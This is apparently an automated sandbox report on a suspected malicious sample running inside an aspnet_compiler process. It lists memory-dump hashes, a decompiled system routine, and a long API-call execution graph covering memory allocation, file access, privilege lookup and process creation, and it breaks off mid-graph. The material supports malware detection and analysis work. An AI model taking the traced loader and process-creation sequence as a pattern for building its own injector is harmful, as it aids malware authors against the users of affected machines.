                          • Opcode Fuzzy Hash: 5a3ba50d5a5d952d49eb24481398d87311c0541e5826b8f0e7968364a2ac5f27
                          • Instruction Fuzzy Hash: F0900261B0500403F140719954187060015A7E0241F51D012A0014595DC7A98A5576E5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ed86a311b1a8a56e08d1053f9961e086fd844bea13d0f374fe4dc27db13192f
                          • Instruction ID: 274e366bfe1f9a8f76cbb622b646ab629cfd6811a8e055f2198ef979900c155c
                          • Opcode Fuzzy Hash: 1ed86a311b1a8a56e08d1053f9961e086fd844bea13d0f374fe4dc27db13192f
                          • Instruction Fuzzy Hash: 2790027170504843F14071994404A460015A7E0345F51C012A00546D5DD7758D55B6A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96c258604692e57d0a29b7fb5e6c3b790e461bf58e8796dfda549c3388ca65b2
                          • Instruction ID: e162b5bcea5a20bcdd4daea0cbbeee0170fa2147aa25ec297e1d2ae21cfd4436
                          • Opcode Fuzzy Hash: 96c258604692e57d0a29b7fb5e6c3b790e461bf58e8796dfda549c3388ca65b2
                          • Instruction Fuzzy Hash: C6900271B0500803F150719944147460005A7E0341F51C012A0014695DC7A58A5576E5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a299f249b9231b6e06361cee9da0bbfc45880d8e440b7374a9154ed4f4a0dc93
                          • Instruction ID: f7bd55b6b814a8b2f4505e7102e8ef2a0c86977232221e8eacf9ea912087033b
                          • Opcode Fuzzy Hash: a299f249b9231b6e06361cee9da0bbfc45880d8e440b7374a9154ed4f4a0dc93
                          • Instruction Fuzzy Hash: CD90027170100843F10061994404B460005A7F0341F51C017A0114695DC765C8517565
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction ID: 047dd80738f97bc7ce8883c92dc23fe64ab29b2cacc50be65158f99d9ffdd175
                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction Fuzzy Hash:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 53%
                          			E0148FDDA(intOrPtr* __edx, intOrPtr _a4) {
                          				void* _t7;
                          				intOrPtr _t9;
                          				intOrPtr _t10;
                          				intOrPtr* _t12;
                          				intOrPtr* _t13;
                          				intOrPtr _t14;
                          				intOrPtr* _t15;
                          
                          				_t13 = __edx;
                          				_push(_a4);
                          				_t14 =  *[fs:0x18];
                          				_t15 = _t12;
                          				_t7 = E0143CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                          				_push(_t13);
                          				E01485720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                          				_t9 =  *_t15;
                          				if(_t9 == 0xffffffff) {
                          					_t10 = 0;
                          				} else {
                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                          				}
                          				_push(_t10);
                          				_push(_t15);
                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                          				return E01485720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                          			}










                          0x0148fdda
                          0x0148fde2
                          0x0148fde5
                          0x0148fdec
                          0x0148fdfa
                          0x0148fdff
                          0x0148fe0a
                          0x0148fe0f
                          0x0148fe17
                          0x0148fe1e
                          0x0148fe19
                          0x0148fe19
                          0x0148fe19
                          0x0148fe20
                          0x0148fe21
                          0x0148fe22
                          0x0148fe25
                          0x0148fe40

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0148FDFA
                          Strings
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0148FE2B
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0148FE01
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                          • API String ID: 885266447-3903918235
                          • Opcode ID: 7abe63bf50938fb133f0c8b33971b50dfbb55fdb3b686abe1f8910dc79382604
                          • Instruction ID: aafab59723e0f885f65a3e31fbb9c0814ec5700ca4456293b88b7349464e71b9
                          • Opcode Fuzzy Hash: 7abe63bf50938fb133f0c8b33971b50dfbb55fdb3b686abe1f8910dc79382604
                          • Instruction Fuzzy Hash: 5EF0FC321002017FDB202A46DC06F377F5ADB54730F14431AF614555E1DA72F87086F0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:4.5%
                          Dynamic/Decrypted Code Coverage:2%
                          Signature Coverage:0%
                          Total number of Nodes:696
                          Total number of Limit Nodes:85
                          execution_graph 33051 3147310 33062 314a030 33051->33062 33053 314742c 33054 314734b 33054->33053 33065 3139b50 33054->33065 33058 31473b0 Sleep 33061 314739d 33058->33061 33061->33053 33061->33058 33074 3146f40 LdrLoadDll 33061->33074 33075 3147140 LdrLoadDll 33061->33075 33063 314a05d 33062->33063 33076 31487d0 33062->33076 33063->33054 33066 3139b74 33065->33066 33067 3139bb0 LdrLoadDll 33066->33067 33068 3139b7b 33066->33068 33067->33068 33069 3143e60 33068->33069 33070 3143e6e 33069->33070 33072 3143e7a 33069->33072 33070->33072 33084 31442e0 LdrLoadDll 33070->33084 33072->33061 33073 3143fcc 33073->33061 33074->33061 33075->33061 33077 31487e6 33076->33077 33080 31491f0 33077->33080 33079 31487ec NtAllocateVirtualMemory 33079->33063 33081 3149200 33080->33081 33082 3149222 33080->33082 33083 3143e60 LdrLoadDll 33081->33083 33082->33079 33083->33082 33084->33073 33085 314d44d 33088 3149c90 33085->33088 33089 3149cb6 33088->33089 33096 3138b70 33089->33096 33091 3149cc2 33092 3149ce6 33091->33092 33104 3137e50 33091->33104 33136 3148940 33092->33136 33139 3138ac0 33096->33139 33098 3138b7d 33099 3138b84 33098->33099 33151 3138a60 33098->33151 33099->33091 33105 3137e77 33104->33105 33548 313a020 33105->33548 33107 3137e89 33552 3139d70 33107->33552 33109 3137ea6 33116 3137ead 33109->33116 33603 3139ca0 LdrLoadDll 33109->33603 33112 3137f16 33113 314a280 2 API calls 33112->33113 33133 3137ff4 33112->33133 33114 3137f2c 33113->33114 33115 314a280 2 API calls 33114->33115 33117 3137f3d 33115->33117 33116->33133 33556 313d180 33116->33556 33118 314a280 2 API calls 33117->33118 33119 3137f4e 33118->33119 33568 313aee0 33119->33568 33121 3137f61 33122 3143a60 8 API calls 33121->33122 33123 3137f72 33122->33123 33124 3143a60 8 API calls 33123->33124 33125 3137f83 33124->33125 33126 3137fa3 33125->33126 33580 313ba50 33125->33580 33128 3143a60 8 API calls 33126->33128 33131 3137feb 33126->33131 33134 3137fba 33128->33134 33586 3137c80 33131->33586 33133->33092 33134->33131 33605 313baf0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33134->33605 33137 314895f 33136->33137 33138 31491f0 LdrLoadDll 33136->33138 33138->33137 33140 3138ad3 33139->33140 33190 3146e60 LdrLoadDll 33139->33190 33170 3146d10 33140->33170 33143 3138ae6 33143->33098 33144 3138adc 33144->33143 33173 3149540 33144->33173 33146 3138b23 33146->33143 33184 31388e0 33146->33184 33148 3138b43 33191 3138330 LdrLoadDll 33148->33191 33150 3138b55 33150->33098 33152 3138a7a 33151->33152 33153 3149830 LdrLoadDll 33151->33153 33527 3149830 33152->33527 33153->33152 33156 3149830 LdrLoadDll 33157 3138aa1 33156->33157 33158 313cf80 33157->33158 33159 313cf99 33158->33159 33531 3139ea0 33159->33531 33161 313cfac 33535 3148470 33161->33535 33164 3138b95 33164->33091 33166 313cfd2 33167 313cffd 33166->33167 33541 31484f0 33166->33541 33169 3148720 2 API calls 33167->33169 33169->33164 33192 3148890 33170->33192 33174 3149559 33173->33174 33195 3143a60 33174->33195 33176 3149571 33177 314957a 33176->33177 33234 3149380 33176->33234 33177->33146 33179 314958e 33179->33177 33252 3148190 33179->33252 33187 31388fa 33184->33187 33505 3136e30 33184->33505 33186 3138901 33186->33148 33187->33186 33518 31370f0 33187->33518 33190->33140 33191->33150 33193 31491f0 LdrLoadDll 33192->33193 33194 3146d25 33193->33194 33194->33144 33196 3143a74 33195->33196 33197 3143d95 33195->33197 33196->33197 33260 3147ee0 33196->33260 33197->33176 33200 3143ba0 33263 31485f0 33200->33263 33201 3143b83 33321 31486f0 LdrLoadDll 33201->33321 33204 3143b8d 33204->33176 33205 3143bc7 33206 314a0b0 2 API calls 33205->33206 33209 3143bd3 33206->33209 33207 3143d59 33210 3148720 2 API calls 33207->33210 33208 3143d6f 33330 31437a0 LdrLoadDll NtReadFile NtClose 33208->33330 33209->33204 33209->33207 33209->33208 33214 3143c62 33209->33214 33211 3143d60 33210->33211 33211->33176 33213 3143d82 33213->33176 33215 3143cc9 33214->33215 33217 3143c71 33214->33217 33215->33207 33216 3143cdc 33215->33216 33323 3148570 33216->33323 33219 3143c76 33217->33219 33220 3143c8a 33217->33220 33322 3143660 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33219->33322 33223 3143ca7 33220->33223 33224 3143c8f 33220->33224 33223->33211 33279 3143420 33223->33279 33267 3143700 33224->33267 33226 3143c80 33226->33176 33228 3143c9d 33228->33176 33230 3143d3c 33327 3148720 33230->33327 33231 3143cbf 33231->33176 33233 3143d48 33233->33176 33235 3149391 33234->33235 33236 31493a3 33235->33236 33237 314a030 2 API calls 33235->33237 33236->33179 33238 31493c4 33237->33238 33350 3143070 33238->33350 33240 3149410 33240->33179 33241 31493e7 33241->33240 33242 3143070 3 API calls 33241->33242 33244 3149409 33242->33244 33244->33240 33382 31443a0 33244->33382 33245 314949a 33246 31494aa 33245->33246 33476 3149190 LdrLoadDll 33245->33476 33392 3149000 33246->33392 33249 31494d8 33471 3148150 33249->33471 33253 31491f0 LdrLoadDll 33252->33253 33254 31481ac 33253->33254 33499 54b967a 33254->33499 33255 31481c7 33257 314a0b0 33255->33257 33502 3148900 33257->33502 33259 31495e9 33259->33146 33261 3143b54 33260->33261 33262 31491f0 LdrLoadDll 33260->33262 33261->33200 33261->33201 33261->33204 33262->33261 33264 31491f0 LdrLoadDll 33263->33264 33265 314860c NtCreateFile 33264->33265 33265->33205 33268 314371c 33267->33268 33269 3148570 LdrLoadDll 33268->33269 33270 314373d 33269->33270 33271 3143744 33270->33271 33272 3143758 33270->33272 33273 3148720 2 API calls 33271->33273 33274 3148720 2 API calls 33272->33274 33275 314374d 33273->33275 33276 3143761 33274->33276 33275->33228 33331 314a2c0 33276->33331 33278 314376c 33278->33228 33280 314346b 33279->33280 33285 314349e 33279->33285 33281 3148570 LdrLoadDll 33280->33281 33283 3143486 33281->33283 33282 31435e9 33284 3148570 LdrLoadDll 33282->33284 33286 3148720 2 API calls 33283->33286 33291 3143604 33284->33291 33285->33282 33287 31434ba 33285->33287 33288 314348f 33286->33288 33289 3148570 LdrLoadDll 33287->33289 33288->33231 33290 31434d5 33289->33290 33293 31434f1 33290->33293 33294 31434dc 33290->33294 33349 31485b0 LdrLoadDll 33291->33349 33295 31434f6 33293->33295 33296 314350c 33293->33296 33298 3148720 2 API calls 33294->33298 33299 3148720 2 API calls 33295->33299 33307 3143511 33296->33307 33337 314a280 33296->33337 33297 314363e 33300 3148720 2 API calls 33297->33300 33301 31434e5 33298->33301 33302 31434ff 33299->33302 33303 3143649 33300->33303 33301->33231 33302->33231 33303->33231 33306 3143577 33308 314358e 33306->33308 33348 3148530 LdrLoadDll 33306->33348 33314 3143523 33307->33314 33340 31486a0 33307->33340 33310 3143595 33308->33310 33311 31435aa 33308->33311 33312 3148720 2 API calls 33310->33312 33313 3148720 2 API calls 33311->33313 33312->33314 33315 31435b3 33313->33315 33314->33231 33316 31435df 33315->33316 33343 3149e80 33315->33343 33316->33231 33318 31435ca 33319 314a0b0 2 API calls 33318->33319 33320 31435d3 33319->33320 33320->33231 33321->33204 33322->33226 33324 31491f0 LdrLoadDll 33323->33324 33325 3143d24 33324->33325 33326 31485b0 LdrLoadDll 33325->33326 33326->33230 33328 314873c NtClose 33327->33328 33329 31491f0 LdrLoadDll 33327->33329 33328->33233 33329->33328 33330->33213 33333 314a2da 33331->33333 33334 31488c0 33331->33334 33333->33278 33335 31491f0 LdrLoadDll 33334->33335 33336 31488dc RtlAllocateHeap 33335->33336 33336->33333 33338 31488c0 2 API calls 33337->33338 33339 314a298 33337->33339 33338->33339 33339->33307 33341 31486bc NtReadFile 33340->33341 33342 31491f0 LdrLoadDll 33340->33342 33341->33306 33342->33341 33344 3149ea4 33343->33344 33345 3149e8d 33343->33345 33344->33318 33345->33344 33346 314a280 2 API calls 33345->33346 33347 3149ebb 33346->33347 33347->33318 33348->33308 33349->33297 33351 3143081 33350->33351 33353 3143089 33350->33353 33351->33241 33352 314335c 33352->33241 33353->33352 33477 314b260 33353->33477 33355 31430dd 33356 314b260 2 API calls 33355->33356 33359 31430e8 33356->33359 33357 3143136 33360 314b260 2 API calls 33357->33360 33359->33357 33361 314b390 3 API calls 33359->33361 33491 314b300 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33359->33491 33363 314314a 33360->33363 33361->33359 33362 31431a7 33364 314b260 2 API calls 33362->33364 33363->33362 33482 314b390 33363->33482 33366 31431bd 33364->33366 33367 31431fa 33366->33367 33370 314b390 3 API calls 33366->33370 33368 314b260 2 API calls 33367->33368 33369 3143205 33368->33369 33371 314b390 3 API calls 33369->33371 33377 314323f 33369->33377 33370->33366 33371->33369 33374 314b2c0 2 API calls 33375 314333e 33374->33375 33376 314b2c0 2 API calls 33375->33376 33378 3143348 33376->33378 33488 314b2c0 33377->33488 33379 314b2c0 2 API calls 33378->33379 33380 3143352 33379->33380 33381 314b2c0 2 API calls 33380->33381 33381->33352 33383 31443b1 33382->33383 33384 3143a60 8 API calls 33383->33384 33386 31443c7 33384->33386 33385 314441a 33385->33245 33386->33385 33387 3144415 33386->33387 33388 3144402 33386->33388 33390 314a0b0 2 API calls 33387->33390 33389 314a0b0 2 API calls 33388->33389 33391 3144407 33389->33391 33390->33385 33391->33245 33492 3148ec0 33392->33492 33395 3148ec0 LdrLoadDll 33396 314901d 33395->33396 33397 3148ec0 LdrLoadDll 33396->33397 33398 3149026 33397->33398 33399 3148ec0 LdrLoadDll 33398->33399 33400 314902f 33399->33400 33401 3148ec0 LdrLoadDll 33400->33401 33402 3149038 33401->33402 33403 3148ec0 LdrLoadDll 33402->33403 33404 3149041 33403->33404 33405 3148ec0 LdrLoadDll 33404->33405 33406 314904d 33405->33406 33407 3148ec0 LdrLoadDll 33406->33407 33408 3149056 33407->33408 33409 3148ec0 LdrLoadDll 33408->33409 33410 314905f 33409->33410 33411 3148ec0 LdrLoadDll 33410->33411 33412 3149068 33411->33412 33413 3148ec0 LdrLoadDll 33412->33413 33414 3149071 33413->33414 33415 3148ec0 LdrLoadDll 33414->33415 33416 314907a 33415->33416 33417 3148ec0 LdrLoadDll 33416->33417 33418 3149086 33417->33418 33419 3148ec0 LdrLoadDll 33418->33419 33420 314908f 33419->33420 33421 3148ec0 LdrLoadDll 33420->33421 33422 3149098 33421->33422 33423 3148ec0 LdrLoadDll 33422->33423 33424 31490a1 33423->33424 33425 3148ec0 LdrLoadDll 33424->33425 33426 31490aa 33425->33426 33427 3148ec0 LdrLoadDll 33426->33427 33428 31490b3 33427->33428 33429 3148ec0 LdrLoadDll 33428->33429 33430 31490bf 33429->33430 33431 3148ec0 LdrLoadDll 33430->33431 33432 31490c8 33431->33432 33433 3148ec0 LdrLoadDll 33432->33433 33434 31490d1 33433->33434 33435 3148ec0 LdrLoadDll 33434->33435 33436 31490da 33435->33436 33437 3148ec0 LdrLoadDll 33436->33437 33438 31490e3 33437->33438 33439 3148ec0 LdrLoadDll 33438->33439 33440 31490ec 33439->33440 33441 3148ec0 LdrLoadDll 33440->33441 33442 31490f8 33441->33442 33443 3148ec0 LdrLoadDll 33442->33443 33444 3149101 33443->33444 33445 3148ec0 LdrLoadDll 33444->33445 33446 314910a 33445->33446 33447 3148ec0 LdrLoadDll 33446->33447 33448 3149113 33447->33448 33449 3148ec0 LdrLoadDll 33448->33449 33450 314911c 33449->33450 33451 3148ec0 LdrLoadDll 33450->33451 33452 3149125 33451->33452 33453 3148ec0 LdrLoadDll 33452->33453 33454 3149131 33453->33454 33455 3148ec0 LdrLoadDll 33454->33455 33456 314913a 33455->33456 33457 3148ec0 LdrLoadDll 33456->33457 33458 3149143 33457->33458 33459 3148ec0 LdrLoadDll 33458->33459 33460 314914c 33459->33460 33461 3148ec0 LdrLoadDll 33460->33461 33462 3149155 33461->33462 33463 3148ec0 LdrLoadDll 33462->33463 33464 314915e 33463->33464 33465 3148ec0 LdrLoadDll 33464->33465 33466 314916a 33465->33466 33467 3148ec0 LdrLoadDll 33466->33467 33468 3149173 33467->33468 33469 3148ec0 LdrLoadDll 33468->33469 33470 314917c 33469->33470 33470->33249 33472 31491f0 LdrLoadDll 33471->33472 33473 314816c 33472->33473 33498 54b9860 LdrInitializeThunk 33473->33498 33474 3148183 33474->33179 33476->33246 33478 314b276 33477->33478 33479 314b270 33477->33479 33480 314a280 2 API calls 33478->33480 33479->33355 33481 314b29c 33480->33481 33481->33355 33483 314b300 33482->33483 33484 314a280 2 API calls 33483->33484 33485 314b35d 33483->33485 33486 314b33a 33484->33486 33485->33363 33487 314a0b0 2 API calls 33486->33487 33487->33485 33489 314a0b0 2 API calls 33488->33489 33490 3143334 33489->33490 33490->33374 33491->33359 33493 3148edb 33492->33493 33494 3143e60 LdrLoadDll 33493->33494 33495 3148efb 33494->33495 33496 3143e60 LdrLoadDll 33495->33496 33497 3148fa7 33495->33497 33496->33497 33497->33395 33498->33474 33500 54b968f LdrInitializeThunk 33499->33500 33501 54b9681 33499->33501 33500->33255 33501->33255 33503 31491f0 LdrLoadDll 33502->33503 33504 314891c RtlFreeHeap 33503->33504 33504->33259 33506 3136e40 33505->33506 33507 3136e3b 33505->33507 33508 314a030 2 API calls 33506->33508 33507->33187 33514 3136e65 33508->33514 33509 3136ec8 33509->33187 33510 3148150 2 API calls 33510->33514 33511 3136ece 33513 3136ef4 33511->33513 33515 3148850 2 API calls 33511->33515 33513->33187 33514->33509 33514->33510 33514->33511 33516 314a030 2 API calls 33514->33516 33521 3148850 33514->33521 33517 3136ee5 33515->33517 33516->33514 33517->33187 33519 3148850 2 API calls 33518->33519 33520 313710e 33519->33520 33520->33148 33522 31491f0 LdrLoadDll 33521->33522 33523 314886c 33522->33523 33526 54b96e0 LdrInitializeThunk 33523->33526 33524 3148883 33524->33514 33526->33524 33528 3149853 33527->33528 33529 3139b50 LdrLoadDll 33528->33529 33530 3138a8b 33529->33530 33530->33156 33532 3139ec3 33531->33532 33533 3139f40 33532->33533 33546 3147f20 LdrLoadDll 33532->33546 33533->33161 33536 31491f0 LdrLoadDll 33535->33536 33537 313cfbb 33536->33537 33537->33164 33538 3148a60 33537->33538 33539 3148a7f LookupPrivilegeValueW 33538->33539 33540 31491f0 LdrLoadDll 33538->33540 33539->33166 33540->33539 33542 31491f0 LdrLoadDll 33541->33542 33543 314850c 33542->33543 33547 54b9910 LdrInitializeThunk 33543->33547 33544 314852b 33544->33167 33546->33533 33547->33544 33549 313a047 33548->33549 33550 3139ea0 LdrLoadDll 33549->33550 33551 313a076 33550->33551 33551->33107 33553 3139d94 33552->33553 33606 3147f20 LdrLoadDll 33553->33606 33555 3139dce 33555->33109 33557 313d1ac 33556->33557 33558 313a020 LdrLoadDll 33557->33558 33559 313d1be 33558->33559 33607 313d090 33559->33607 33562 313d1f1 33564 313d202 33562->33564 33567 3148720 2 API calls 33562->33567 33563 313d1d9 33565 313d1e4 33563->33565 33566 3148720 2 API calls 33563->33566 33564->33112 33565->33112 33566->33565 33567->33564 33569 313aef6 33568->33569 33570 313af00 33568->33570 33569->33121 33571 3139ea0 LdrLoadDll 33570->33571 33572 313af71 33571->33572 33573 3139d70 LdrLoadDll 33572->33573 33574 313af85 33573->33574 33575 313afa8 33574->33575 33576 3139ea0 LdrLoadDll 33574->33576 33575->33121 33577 313afc4 33576->33577 33578 3143a60 8 API calls 33577->33578 33579 313b019 33578->33579 33579->33121 33581 313ba76 33580->33581 33582 3139ea0 LdrLoadDll 33581->33582 33583 313ba8a 33582->33583 33626 313b740 33583->33626 33585 3137f9c 33604 313b030 LdrLoadDll 33585->33604 33588 3137c93 33586->33588 33655 313d440 33586->33655 33599 3137e41 33588->33599 33660 31433b0 33588->33660 33590 3137cf2 33590->33599 33663 3137a30 33590->33663 33593 314b260 2 API calls 33594 3137d39 33593->33594 33595 314b390 3 API calls 33594->33595 33600 3137d4e 33595->33600 33596 3136e30 4 API calls 33596->33600 33599->33133 33600->33596 33600->33599 33602 31370f0 2 API calls 33600->33602 33668 313ac10 33600->33668 33718 313d3e0 33600->33718 33722 313cec0 20 API calls 33600->33722 33602->33600 33603->33116 33604->33126 33605->33131 33606->33555 33608 313d0aa 33607->33608 33616 313d160 33607->33616 33609 3139ea0 LdrLoadDll 33608->33609 33610 313d0cc 33609->33610 33617 31481d0 33610->33617 33612 313d10e 33620 3148210 33612->33620 33615 3148720 2 API calls 33615->33616 33616->33562 33616->33563 33618 31491f0 LdrLoadDll 33617->33618 33619 31481ec 33618->33619 33619->33612 33621 31491f0 LdrLoadDll 33620->33621 33622 314822c 33621->33622 33625 54b9fe0 LdrInitializeThunk 33622->33625 33623 313d154 33623->33615 33625->33623 33627 313b757 33626->33627 33635 313d480 33627->33635 33631 313b7cb 33632 313b7d2 33631->33632 33646 3148530 LdrLoadDll 33631->33646 33632->33585 33634 313b7e5 33634->33585 33636 313d4a5 33635->33636 33647 3137130 33636->33647 33638 313b79f 33643 3148970 33638->33643 33639 3143a60 8 API calls 33641 313d4c9 33639->33641 33641->33638 33641->33639 33642 314a0b0 2 API calls 33641->33642 33654 313d2c0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 33641->33654 33642->33641 33644 31491f0 LdrLoadDll 33643->33644 33645 314898f CreateProcessInternalW 33644->33645 33645->33631 33646->33634 33648 313722f 33647->33648 33649 3137145 33647->33649 33648->33641 33649->33648 33650 3143a60 8 API calls 33649->33650 33651 31371b2 33650->33651 33652 314a0b0 2 API calls 33651->33652 33653 31371d9 33651->33653 33652->33653 33653->33641 33654->33641 33656 3143e60 LdrLoadDll 33655->33656 33657 313d45f 33656->33657 33658 313d466 SetErrorMode 33657->33658 33659 313d46d 33657->33659 33658->33659 33659->33588 33723 313d210 33660->33723 33662 31433d6 33662->33590 33664 314a030 2 API calls 33663->33664 33667 3137a55 33664->33667 33665 3137c6a 33665->33593 33667->33665 33742 3147b10 33667->33742 33669 313ac2f 33668->33669 33670 313ac29 33668->33670 33799 3138630 33669->33799 33790 313ccd0 33670->33790 33673 313ac3c 33674 314b390 3 API calls 33673->33674 33717 313aec8 33673->33717 33675 313ac58 33674->33675 33676 313ac6c 33675->33676 33677 313d3e0 2 API calls 33675->33677 33808 3147fa0 33676->33808 33677->33676 33680 313ad96 33822 313abb0 LdrLoadDll LdrInitializeThunk 33680->33822 33681 3148190 2 API calls 33682 313acea 33681->33682 33682->33680 33687 313acf6 33682->33687 33684 313adb5 33685 313adbd 33684->33685 33823 313ab20 LdrLoadDll NtClose LdrInitializeThunk 33684->33823 33688 3148720 2 API calls 33685->33688 33686 313ad3f 33692 3148720 2 API calls 33686->33692 33687->33686 33690 31482a0 2 API calls 33687->33690 33687->33717 33691 313adc7 33688->33691 33690->33686 33691->33600 33694 313ad5c 33692->33694 33693 313addf 33693->33685 33695 313ade6 33693->33695 33811 31475c0 33694->33811 33697 313adfe 33695->33697 33824 313aaa0 LdrLoadDll LdrInitializeThunk 33695->33824 33825 3148020 LdrLoadDll 33697->33825 33699 313ad73 33699->33717 33814 3137290 33699->33814 33701 313ae12 33826 313a920 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33701->33826 33704 313ad8c 33704->33600 33705 313ae36 33706 313ae83 33705->33706 33827 3148050 LdrLoadDll 33705->33827 33829 31480b0 LdrLoadDll 33706->33829 33709 313ae54 33709->33706 33828 31480e0 LdrLoadDll 33709->33828 33710 313ae91 33711 3148720 2 API calls 33710->33711 33712 313ae9b 33711->33712 33713 3148720 2 API calls 33712->33713 33715 313aea5 33713->33715 33716 3137290 2 API calls 33715->33716 33715->33717 33716->33717 33717->33600 33719 313d3f3 33718->33719 33900 3148120 33719->33900 33722->33600 33724 313d22d 33723->33724 33730 3148250 33724->33730 33727 313d275 33727->33662 33731 31491f0 LdrLoadDll 33730->33731 33732 314826c 33731->33732 33740 54b99a0 LdrInitializeThunk 33732->33740 33733 313d26e 33733->33727 33735 31482a0 33733->33735 33736 31482bc 33735->33736 33737 31491f0 LdrLoadDll 33735->33737 33741 54b9780 LdrInitializeThunk 33736->33741 33737->33736 33738 313d29e 33738->33662 33740->33733 33741->33738 33743 314a280 2 API calls 33742->33743 33744 3147b27 33743->33744 33763 3138170 33744->33763 33746 3147b42 33747 3147b80 33746->33747 33748 3147b69 33746->33748 33750 314a030 2 API calls 33747->33750 33749 314a0b0 2 API calls 33748->33749 33751 3147b76 33749->33751 33752 3147bba 33750->33752 33751->33665 33753 314a030 2 API calls 33752->33753 33754 3147bd3 33753->33754 33760 3147e74 33754->33760 33769 314a070 LdrLoadDll 33754->33769 33756 3147e59 33757 3147e60 33756->33757 33756->33760 33758 314a0b0 2 API calls 33757->33758 33759 3147e6a 33758->33759 33759->33665 33761 314a0b0 2 API calls 33760->33761 33762 3147ec9 33761->33762 33762->33665 33764 3138195 33763->33764 33765 3139b50 LdrLoadDll 33764->33765 33766 31381c8 33765->33766 33768 31381ed 33766->33768 33770 313b350 33766->33770 33768->33746 33769->33756 33771 313b37c 33770->33771 33772 3148470 LdrLoadDll 33771->33772 33773 313b395 33772->33773 33774 313b39c 33773->33774 33781 31484b0 33773->33781 33774->33768 33778 313b3d7 33779 3148720 2 API calls 33778->33779 33780 313b3fa 33779->33780 33780->33768 33782 31491f0 LdrLoadDll 33781->33782 33783 31484cc 33782->33783 33789 54b9710 LdrInitializeThunk 33783->33789 33784 313b3bf 33784->33774 33786 3148aa0 33784->33786 33787 3148abf 33786->33787 33788 31491f0 LdrLoadDll 33786->33788 33787->33778 33788->33787 33789->33784 33830 313bdc0 33790->33830 33792 313cce7 33793 313cd00 33792->33793 33843 3133d70 33792->33843 33795 314a280 2 API calls 33793->33795 33797 313cd0e 33795->33797 33796 313ccfa 33867 3147440 33796->33867 33797->33669 33800 313864b 33799->33800 33801 313d090 3 API calls 33800->33801 33807 313876b 33800->33807 33802 313874c 33801->33802 33803 313877a 33802->33803 33804 3138761 33802->33804 33805 3148720 2 API calls 33802->33805 33803->33673 33899 3135ea0 LdrLoadDll 33804->33899 33805->33804 33807->33673 33809 313acc0 33808->33809 33810 31491f0 LdrLoadDll 33808->33810 33809->33680 33809->33681 33809->33717 33810->33809 33812 313d3e0 2 API calls 33811->33812 33813 31475f2 33812->33813 33813->33699 33815 31372a8 33814->33815 33816 3139b50 LdrLoadDll 33815->33816 33817 31372c3 33816->33817 33818 3143e60 LdrLoadDll 33817->33818 33819 31372d3 33818->33819 33820 31372f0 33819->33820 33821 31372dc PostThreadMessageW 33819->33821 33820->33704 33821->33820 33822->33684 33823->33693 33824->33697 33825->33701 33826->33705 33827->33709 33828->33706 33829->33710 33831 313bdf3 33830->33831 33872 313a160 33831->33872 33833 313be05 33876 313a2d0 33833->33876 33835 313be23 33836 313a2d0 LdrLoadDll 33835->33836 33837 313be39 33836->33837 33838 313d210 3 API calls 33837->33838 33839 313be5d 33838->33839 33840 313be64 33839->33840 33841 314a2c0 2 API calls 33839->33841 33840->33792 33842 313be74 33841->33842 33842->33792 33844 3133d96 33843->33844 33845 313b350 3 API calls 33844->33845 33847 3133e61 33845->33847 33846 3133e68 